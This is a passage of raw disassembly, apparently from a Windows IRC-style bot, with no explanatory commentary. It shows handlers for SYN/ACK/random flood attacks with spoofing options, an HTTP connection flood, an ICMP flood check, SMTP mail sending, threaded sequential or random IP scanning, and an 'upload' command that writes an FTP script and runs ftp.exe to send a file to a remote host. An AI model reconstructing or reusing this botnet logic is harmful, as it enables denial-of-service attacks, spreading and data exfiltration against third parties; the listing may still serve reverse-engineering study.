push eax
call dword_444168 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_444100 ; socket
push [ebp+4Ch+var_20]
mov esi, eax
mov [ebp+4Ch+var_324], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+4Ch+var_320], eax
call dword_444260 ; htons
mov [ebp+4Ch+var_322], ax
lea eax, [ebp+4Ch+var_4290]
push eax
lea eax, [ebp+4Ch+var_4090]
push eax
lea eax, [ebp+4Ch+var_4290]
push eax
lea eax, [ebp+4Ch+var_4390]
push eax
lea eax, [ebp+4Ch+var_4090]
push eax
lea eax, [ebp+4Ch+var_5990]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax ; Dest
call _sprintf
add esp, 1Ch
push 10h
lea eax, [ebp+4Ch+var_324]
push eax
push esi
call dword_4440AC ; connect
push ebx
mov edi, 100h
push edi
lea eax, [ebp+4Ch+var_4190]
push eax
push esi
call dword_444064 ; recv
lea eax, [ebp+4Ch+var_4190]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+4Ch+var_5990]
push eax
push esi
call dword_4441A0 ; send
push ebx
push edi
lea eax, [ebp+4Ch+var_4190]
push eax
push esi
call dword_444064 ; recv
push esi
call dword_444218 ; closesocket
call dword_444224 ; WSACleanup
lea eax, [ebp+4Ch+var_4390]
push eax
push offset asc_42DE1C ; "-"
loc_4076D4: ; CODE XREF: sub_40274D+2C5C�j
; sub_40274D+636F�j ...
lea eax, [ebp+4Ch+Dst]
loc_4076DA: ; CODE XREF: sub_40274D+6671�j
push eax ; Dest
call _sprintf
loc_4076E0: ; CODE XREF: sub_40274D+226D�j
add esp, 0Ch
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_4076E8: ; CODE XREF: sub_40274D+4E31�j
push [ebp+4Ch+var_10] ; Str2
push offset aHttpcon ; "httpcon"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_407712
push [ebp+4Ch+var_10] ; Str2
push offset aHcon ; "hcon"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_407C7B
loc_407712: ; CODE XREF: sub_40274D+4FAC�j
push [ebp+esi+4Ch+var_90] ; int
push [ebp+4Ch+var_14] ; int
push [ebp+4Ch+arg_0] ; int
push edi ; Str
call j__atol
pop ecx
push eax ; int
push [ebp+4Ch+var_8] ; int
push [ebp+4Ch+var_C] ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_4128A1
jmp loc_40A0AE
; ---------------------------------------------------------------------------
loc_40773D: ; CODE XREF: sub_40274D+4E03�j
; sub_40274D+4E1A�j
push [ebp+4Ch+var_8] ; Format
mov esi, 80h
lea eax, [ebp+4Ch+var_135C]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+4Ch+var_135C]
push eax ; Str2
push offset aSyn ; "syn"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_4077A2
lea eax, [ebp+4Ch+var_135C]
push eax ; Str2
push offset aAck ; "ack"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4077A2
lea eax, [ebp+4Ch+var_135C]
push eax ; Str2
push offset aRandom_0 ; "random"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4077A2
push offset unk_42DDD4
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_4077A2: ; CODE XREF: sub_40274D+501B�j
; sub_40274D+5032�j ...
push [ebp+4Ch+var_14] ; Str
call j__atol
cmp eax, ebx
pop ecx
mov [ebp+4Ch+var_1254], eax
jle loc_4078C4
push [ebp+4Ch+var_8] ; Format
lea eax, [ebp+4Ch+var_135C]
push esi ; Count
push eax ; Dest
call __snprintf
push edi ; Format
lea eax, [ebp+4Ch+var_13DC]
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+4Ch+arg_0] ; Str
call j__atol
push [ebp+4Ch+Format] ; Format
mov [ebp+4Ch+var_1258], eax
xor eax, eax
cmp [ebp+4Ch+var_8F6], bl
push esi ; Count
setnz al
mov [ebp+4Ch+var_1250], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_13E0], eax
lea eax, [ebp+4Ch+var_12DC]
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_124C], eax
mov eax, [ebp+4Ch+var_C]
add esp, 28h
cmp [ebp+4Ch+var_1250], ebx
mov [ebp+4Ch+var_1248], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_407836
mov eax, offset aNormal ; "Normal"
loc_407836: ; CODE XREF: sub_40274D+50E2�j
push [ebp+4Ch+var_14]
push [ebp+4Ch+arg_0]
push edi
push [ebp+4Ch+var_8]
push eax
push offset asc_42DD90 ; "-"
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 14h ; int
push eax ; Source
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_125C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_13E0]
push eax
push offset sub_416B1E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_125C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4078B7
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DD58
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4078AF: ; CODE XREF: sub_40274D+5170�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4078B7: ; CODE XREF: sub_40274D+514F�j
cmp [ebp+4Ch+var_1244], ebx
jz short loc_4078AF
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4078C4: ; CODE XREF: sub_40274D+5066�j
push offset asc_42DD20 ; "-"
loc_4078C9: ; CODE XREF: sub_40274D+1E23�j
; sub_40274D+1E39�j ...
lea eax, [ebp+4Ch+Dst]
loc_4078CF: ; CODE XREF: sub_40274D+4042�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4078DC: ; CODE XREF: sub_40274D+4DBE�j
; sub_40274D+4DD5�j ...
cmp dword_444294, ebx
jnz loc_4079E4
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_FFC], eax
mov eax, [ebp+4Ch+var_4]
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
mov [ebp+4Ch+var_1000], eax
lea eax, [ebp+4Ch+var_1094]
push eax ; Dest
call _strncpy
push edi ; Str
call j__atol
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_1014], eax
call j__atol
push [ebp+4Ch+var_14] ; Str
mov [ebp+4Ch+var_1010], eax
call j__atol
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
mov [ebp+4Ch+var_100C], eax
lea eax, [ebp+4Ch+var_1114]
push eax ; Dest
call _strncpy
push [ebp+4Ch+var_100C]
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_1010]
mov [ebp+4Ch+var_1118], eax
lea eax, [ebp+4Ch+var_1094]
push eax
push [ebp+4Ch+var_1014]
lea eax, [ebp+4Ch+Dst]
push offset asc_42DCD8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 16h ; int
push eax ; Source
call sub_40AE85
add esp, 48h
mov [ebp+4Ch+var_1004], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1118]
push eax
push offset sub_415F82
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1004]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4079D7
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DC9C
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4079CF: ; CODE XREF: sub_40274D+5290�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4079D7: ; CODE XREF: sub_40274D+526F�j
cmp [ebp+4Ch+var_FF8], ebx
jz short loc_4079CF
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4079E4: ; CODE XREF: sub_40274D+5195�j
push 1FFh ; Count
lea eax, [ebp+4Ch+Dst]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax ; Dest
call _strncpy
jmp loc_40698A
; ---------------------------------------------------------------------------
loc_4079FF: ; CODE XREF: sub_40274D+4D90�j
; sub_40274D+4DA7�j
push edi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push [ebp+4Ch+arg_0]
push offset asc_42DC48 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push [ebp+4Ch+arg_0] ; Str
call _strlen
push edi ; Str
mov [ebp+4Ch+var_24], eax
call _strlen
mov ecx, [ebp+4Ch+var_24]
push [ebp+4Ch+var_8] ; Str
add ecx, eax
mov [ebp+4Ch+var_24], ecx
call _strlen
mov ecx, [ebp+4Ch+var_24]
push [ebp+4Ch+var_10] ; Str
add ecx, eax
mov [ebp+4Ch+var_24], ecx
call _strlen
add eax, [ebp+4Ch+var_18]
mov ecx, [ebp+4Ch+var_24]
push [ebp+4Ch+var_14] ; SubStr
lea eax, [eax+ecx+7]
push eax ; Str
call _strstr
add esp, 40h
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_18], eax
call j__atol
cmp eax, ebx
mov edi, [ebp+4Ch+var_20]
pop ecx
mov [ebp+4Ch+File], eax
mov [ebp+4Ch+var_24], ebx
jle short loc_407AED
loc_407A8D: ; CODE XREF: sub_40274D+5364�j
push [ebp+4Ch+var_18] ; int
push edi ; int
push [ebp+4Ch+var_8] ; Source
call sub_41B24B
add esp, 0Ch
cmp eax, 1
mov [ebp+4Ch+var_20], eax
jz short loc_407AB5
cmp eax, ebx
jnz short loc_407AC0
inc [ebp+4Ch+var_24]
mov eax, [ebp+4Ch+var_24]
cmp eax, [ebp+4Ch+File]
jl short loc_407A8D
jmp short loc_407AF6
; ---------------------------------------------------------------------------
loc_407AB5: ; CODE XREF: sub_40274D+5355�j
push ebx
push [ebp+4Ch+var_4]
push offset unk_42DC10
jmp short loc_407AFF
; ---------------------------------------------------------------------------
loc_407AC0: ; CODE XREF: sub_40274D+5359�j
push [ebp+4Ch+var_20]
lea eax, [ebp+4Ch+Dst]
push offset asc_42DBDC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 20h
loc_407AED: ; CODE XREF: sub_40274D+533E�j
cmp [ebp+4Ch+var_20], ebx
jnz loc_407C7B
loc_407AF6: ; CODE XREF: sub_40274D+5366�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset unk_42DBA8 ; int
loc_407AFF: ; CODE XREF: sub_40274D+5371�j
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
jmp loc_407C7B
; ---------------------------------------------------------------------------
loc_407B12: ; CODE XREF: sub_40274D+4D4B�j
; sub_40274D+4D62�j ...
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_C6C], eax
mov eax, [ebp+4Ch+var_4]
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
mov [ebp+4Ch+var_C70], eax
lea eax, [ebp+4Ch+var_D04]
push eax ; Dest
call _strncpy
push edi ; Str
call j__atol
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_C84], eax
call j__atol
push [ebp+4Ch+var_14] ; Str
mov [ebp+4Ch+var_C80], eax
call j__atol
mov esi, [ebp+esi+4Ch+var_90]
add esp, 18h
cmp esi, ebx
mov [ebp+4Ch+var_C7C], eax
jz short loc_407B77
push esi ; Str
call j__atol
pop ecx
mov [ebp+4Ch+var_C78], eax
jmp short loc_407B7D
; ---------------------------------------------------------------------------
loc_407B77: ; CODE XREF: sub_40274D+5419�j
mov [ebp+4Ch+var_C78], ebx
loc_407B7D: ; CODE XREF: sub_40274D+5428�j
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_D84]
push eax ; Dest
call _strncpy
push [ebp+4Ch+var_C7C]
mov esi, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_C80]
lea eax, [ebp+4Ch+var_D04]
push eax
push [ebp+4Ch+var_C84]
lea eax, [ebp+4Ch+Dst]
push offset asc_42DB60 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_D88], esi
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 17h ; int
push eax ; Source
call sub_40AE85
add esp, 30h
mov [ebp+4Ch+var_C74], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_D88]
push eax
push offset sub_416104
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_C74]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_407C21
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DB28
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_407C19: ; CODE XREF: sub_40274D+54DA�j
push 32h
call ds:dword_42B014 ; Sleep
loc_407C21: ; CODE XREF: sub_40274D+54B9�j
cmp [ebp+4Ch+var_C68], ebx
jz short loc_407C19
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_407C2E: ; CODE XREF: sub_40274D+4D1D�j
; sub_40274D+4D34�j
push 0Bh
call sub_40B075
push edi ; Str
mov [ebp+4Ch+var_20], eax
call j__atol
add eax, [ebp+4Ch+var_20]
pop ecx
cmp eax, 1F4h
pop ecx
jle loc_407DF1
push [ebp+4Ch+var_20]
lea eax, [ebp+4Ch+Dst]
push offset asc_42DAE8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 20h
loc_407C7B: ; CODE XREF: sub_40274D+4FBF�j
; sub_40274D+53A3�j ...
mov esi, [ebp+esi+4Ch+var_90]
cmp esi, ebx
jz loc_402B92
push [ebp+4Ch+var_10] ; Str2
push offset aUpload ; "upload"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_404979
push 4
push esi
call sub_419429
test eax, eax
pop ecx
pop ecx
jnz short loc_407CC6
push esi
push offset asc_42DAC0 ; "-"
loc_407CB2: ; CODE XREF: sub_40274D+7774�j
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_404A5B
; ---------------------------------------------------------------------------
loc_407CC6: ; CODE XREF: sub_40274D+555D�j
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call _rand
push 9
cdq
pop ecx
idiv ecx
push edx
call _rand
push 63h
cdq
pop ecx
idiv ecx
push edx
call _rand
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+4Ch+var_5200]
push edx
push eax
lea eax, [ebp+4Ch+var_2E60]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+var_2E60]
push offset aAb ; "ab"
push eax ; char *
call _fopen
add esp, 20h
cmp eax, ebx
mov [ebp+4Ch+File], eax
jz loc_402B92
push esi
push [ebp+4Ch+var_14]
push [ebp+4Ch+arg_0]
push edi
push [ebp+4Ch+var_8]
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax ; FILE *
call _fprintf
push [ebp+4Ch+File] ; File
call _fclose
lea eax, [ebp+4Ch+var_2E60]
push eax
lea eax, [ebp+4Ch+var_4CF8]
push offset aSS_2 ; "-s:%s"
push eax ; Dest
call _sprintf
add esp, 2Ch
push ebx
push ebx
lea eax, [ebp+4Ch+var_4CF8]
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_444214
test eax, eax
push [ebp+4Ch+var_8]
push esi ; Format
jz short loc_407D92
push offset unk_42DA50
jmp short loc_407D97
; ---------------------------------------------------------------------------
loc_407D92: ; CODE XREF: sub_40274D+563C�j
push offset asc_42DA20 ; "-"
loc_407D97: ; CODE XREF: sub_40274D+5643�j
call _sprintf
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz short loc_407DBD
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_407DBD: ; CODE XREF: sub_40274D+5655�j
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
jmp short loc_407DD7
; ---------------------------------------------------------------------------
loc_407DCB: ; CODE XREF: sub_40274D+569D�j
lea eax, [ebp+4Ch+var_2E60]
push eax
call sub_41EC78
loc_407DD7: ; CODE XREF: sub_40274D+567C�j
lea eax, [ebp+4Ch+var_2E60]
push 4
push eax
call sub_419429
add esp, 0Ch
test eax, eax
jnz short loc_407DCB
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_407DF1: ; CODE XREF: sub_40274D+54FB�j
push [ebp+4Ch+var_8] ; Str
call j__atol
push edi ; Str
mov [ebp+4Ch+var_378], eax
call j__atol
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_360], eax
call j__atol
add esp, 0Ch
cmp eax, 5
mov [ebp+4Ch+var_374], eax
jnb short loc_407E2A
push 5
pop eax
mov [ebp+4Ch+var_374], eax
loc_407E2A: ; CODE XREF: sub_40274D+56D2�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_407E37
mov [ebp+4Ch+var_374], ecx
loc_407E37: ; CODE XREF: sub_40274D+56E2�j
push [ebp+4Ch+var_14] ; Str
call j__atol
mov [ebp+4Ch+var_370], eax
mov eax, 320h
cmp [ebp+4Ch+var_370], eax
pop ecx
jbe short loc_407E59
mov [ebp+4Ch+var_370], eax
loc_407E59: ; CODE XREF: sub_40274D+5704�j
or [ebp+4Ch+var_35C], 0FFFFFFFFh
cmp dword_43D878, ebx
mov [ebp+4Ch+var_24], ebx
jz short loc_407EA8
mov edi, offset dword_43D878
loc_407E70: ; CODE XREF: sub_40274D+573D�j
push [ebp+4Ch+var_8] ; Str2
lea eax, [edi-28h]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_407E8E
inc [ebp+4Ch+var_24]
add edi, 40h
cmp [edi], ebx
jnz short loc_407E70
jmp short loc_407EA8
; ---------------------------------------------------------------------------
loc_407E8E: ; CODE XREF: sub_40274D+5733�j
mov eax, [ebp+4Ch+var_24]
mov ecx, eax
shl ecx, 6
mov ecx, dword_43D878[ecx]
mov [ebp+4Ch+var_378], ecx
mov [ebp+4Ch+var_35C], eax
loc_407EA8: ; CODE XREF: sub_40274D+571C�j
; sub_40274D+573F�j
cmp [ebp+4Ch+var_378], ebx
jnz short loc_407EBA
push offset unk_42D9EC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_407EBA: ; CODE XREF: sub_40274D+5761�j
mov edi, [ebp+esi+4Ch+var_90]
cmp edi, ebx
mov [ebp+4Ch+File], edi
jz short loc_407EF5
cmp byte ptr [edi], 23h
jz short loc_407EF5
push edi ; Format
lea eax, [ebp+4Ch+var_48C]
push 10h ; Count
push eax ; Dest
call __snprintf
push 78h ; Val
push edi ; Str
call _strchr
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+4Ch+var_34C], eax
jmp loc_407FD0
; ---------------------------------------------------------------------------
loc_407EF5: ; CODE XREF: sub_40274D+5776�j
; sub_40274D+577B�j
cmp [ebp+4Ch+var_907], bl
jnz short loc_407F17
cmp [ebp+4Ch+var_906], bl
jnz short loc_407F17
cmp [ebp+4Ch+var_8F6], bl
jnz short loc_407F17
push offset unk_42D9B8
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_407F17: ; CODE XREF: sub_40274D+57AE�j
; sub_40274D+57B6�j ...
push 10h
pop edi
lea eax, [ebp+4Ch+var_2D4]
push eax
lea eax, [ebp+4Ch+var_300]
push eax
push [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_2D4], edi
call dword_444068 ; getsockname
mov al, [ebp+4Ch+var_907]
neg al
push edi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+4Ch+var_2FC], eax
push [ebp+4Ch+var_2FC] ; Count
call dword_444188 ; inet_ntoa
push eax ; Source
lea eax, [ebp+4Ch+var_48C]
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+4Ch+var_8F6], bl
jz short loc_407FCA
xor eax, eax
cmp [ebp+4Ch+var_907], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+4Ch+var_48C]
push eax ; Str
call _strrchr
cmp edi, ebx
pop ecx
pop ecx
mov byte ptr [ebp+4Ch+arg_0+3], bl
jle short loc_407FBE
loc_407F9C: ; CODE XREF: sub_40274D+586F�j
cmp eax, ebx
jz short loc_407FBE
mov byte ptr [eax], 78h
lea eax, [ebp+4Ch+var_48C]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+4Ch+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+4Ch+arg_0+3]
cmp ecx, edi
jl short loc_407F9C
loc_407FBE: ; CODE XREF: sub_40274D+584D�j
; sub_40274D+5851�j
mov [ebp+4Ch+var_34C], 1
jmp short loc_407FD0
; ---------------------------------------------------------------------------
loc_407FCA: ; CODE XREF: sub_40274D+5827�j
mov [ebp+4Ch+var_34C], ebx
loc_407FD0: ; CODE XREF: sub_40274D+57A3�j
; sub_40274D+587B�j
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+Format] ; Format
mov [ebp+4Ch+var_37C], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_354], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_350], eax
mov edi, 80h
lea eax, [ebp+4Ch+var_47C]
push edi ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+4Ch+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_40801E
loc_40800B: ; CODE XREF: sub_40274D+58F4�j
push esi ; Format
loc_40800C: ; CODE XREF: sub_40274D+58DE�j
lea eax, [ebp+4Ch+var_3FC]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_408049
; ---------------------------------------------------------------------------
loc_40801E: ; CODE XREF: sub_40274D+58BC�j
mov eax, [ebp+4Ch+File]
cmp eax, ebx
jz short loc_40802D
cmp byte ptr [eax], 23h
jnz short loc_40802D
push eax
jmp short loc_40800C
; ---------------------------------------------------------------------------
loc_40802D: ; CODE XREF: sub_40274D+58D6�j
; sub_40274D+58DB�j
push offset byte_42B633 ; Str2
mov esi, offset a_fast__1 ; "#.fast.#"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_40800B
mov [ebp+4Ch+var_3FC], bl
loc_408049: ; CODE XREF: sub_40274D+58CF�j
cmp [ebp+4Ch+var_34C], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_40805B
mov eax, offset aSequential ; "Sequential"
loc_40805B: ; CODE XREF: sub_40274D+5907�j
push [ebp+4Ch+var_360]
lea ecx, [ebp+4Ch+var_48C]
push [ebp+4Ch+var_370]
push [ebp+4Ch+var_374]
push [ebp+4Ch+var_378]
push ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D950 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Bh ; int
push eax ; Source
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_36C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_48C]
push eax
push offset sub_40BEFE
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_36C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4080EC
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D918
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4080E4: ; CODE XREF: sub_40274D+59A5�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4080EC: ; CODE XREF: sub_40274D+5984�j
cmp [ebp+4Ch+var_348], ebx
jz short loc_4080E4
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4080F9: ; CODE XREF: sub_40274D+4CEF�j
; sub_40274D+4D06�j
push [ebp+4Ch+var_8]
call sub_4022BD
push edi ; Str
mov [ebp+4Ch+var_4E8], eax
call j__atol
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_4F8], eax
call j__atol
push [ebp+4Ch+var_14] ; Str
mov [ebp+4Ch+var_4F4], eax
call j__atol
mov esi, [ebp+4Ch+arg_4]
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
mov [ebp+4Ch+var_4F0], eax
lea eax, [ebp+4Ch+var_578]
push eax ; Dest
mov [ebp+4Ch+var_57C], esi
call _strncpy
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 1Ch
push [ebp+4Ch+var_4F4]
mov [ebp+4Ch+var_4E0], edi
push [ebp+4Ch+var_4F8]
mov [ebp+4Ch+var_4DC], eax
push [ebp+4Ch+var_4F0]
push [ebp+4Ch+var_4E8]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D8C8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Bh ; int
push eax ; Source
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_4EC], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_57C]
push eax
push offset sub_40C4C0
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_4EC]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4081EE
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D888
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4081E6: ; CODE XREF: sub_40274D+5AA7�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4081EE: ; CODE XREF: sub_40274D+5A86�j
cmp [ebp+4Ch+var_4D8], ebx
jz short loc_4081E6
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4081FB: ; CODE XREF: sub_40274D+4CB2�j
; sub_40274D+4CC9�j
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
cmp byte_444500[eax], bl
pop ecx
jz loc_404979
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi ; Str
call _strlen
push [ebp+4Ch+var_8] ; Str
mov esi, eax
call _strlen
push [ebp+4Ch+var_10] ; Str
add esi, eax
call _strlen
add eax, [ebp+4Ch+var_18]
push [ebp+4Ch+arg_0] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
push esi
lea eax, [ebp+4Ch+Dst]
push offset dword_42D87C ; Format
push eax ; Dest
call _sprintf
add esp, 20h
cmp esi, ebx
jz loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
test eax, eax
pop ecx
jle loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
push ebx ; int
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push edi ; Str
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_40123B
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
add esp, 18h
cmp byte ptr dword_4442E8[eax], 73h
jnz loc_404979
push esi
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
pop ecx
add eax, offset byte_444500
push eax
push edi
push offset aSSS_0 ; "[%s] * %s %s"
jmp loc_4083C8
; ---------------------------------------------------------------------------
loc_4082F0: ; CODE XREF: sub_40274D+4C84�j
; sub_40274D+4C9B�j
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
cmp byte_444500[eax], bl
pop ecx
jz loc_404979
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi ; Str
call _strlen
push [ebp+4Ch+var_8] ; Str
mov esi, eax
call _strlen
push [ebp+4Ch+var_10] ; Str
add esi, eax
call _strlen
add eax, [ebp+4Ch+var_18]
push [ebp+4Ch+arg_0] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
test eax, eax
pop ecx
jle loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
push ebx ; int
push ebx ; int
push esi ; int
push edi ; Str
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_40123B
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
add esp, 18h
